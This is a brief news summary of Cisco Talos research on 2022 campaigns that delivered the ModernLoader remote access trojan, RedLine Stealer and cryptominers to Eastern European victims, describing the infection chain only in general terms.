"Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers"

Between March and June 2022, three different but related campaigns were discovered delivering ModernLoader, RedLine Stealer, and cryptocurrency miners onto compromised systems. According to Cisco Talos researcher Vanja Svajcer, the actors use PowerShell, .NET assemblies, HTML Application (HTA), and Virtual Basic Script (VBS) files to spread across a targeted network, dropping other pieces of malware, such as the SystemBC Trojan and DCRat, to enable various stages of their operations. ModernLoader, the malicious implant in question, is designed to give attackers remote control over the victim's machine, allowing them to deploy additional malware, steal sensitive information, or even entrap the computer in a botnet. Cisco Talos attributed the infections to a previously unknown but Russian-speaking threat actor, citing the use of commercially available tools. Eastern European users in Bulgaria, Poland, Hungary, and Russia were among the potential targets. Infection chains discovered by the cybersecurity firm include attempts to compromise vulnerable web applications such as WordPress and cPanel in order to distribute malware via files disguised as fake Amazon gift cards. The first stage payload is an HTA file that executes a PowerShell script hosted on the command-and-control (C2) server to begin the deployment of interim payloads, which eventually inject the malware via a technique known as process hollowing. ModernLoader, also known as Avatar bot, is described as a simple .NET Remote Access Trojan (RAT) with features to gather system information, execute arbitrary commands, or download and run a file from the C2 server, enabling the adversary to change the modules in real-time. This article continues to discuss hackers' use of ModernLoader to infect victims' systems with stealers and cryptocurrency miners.

THN reports "Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers"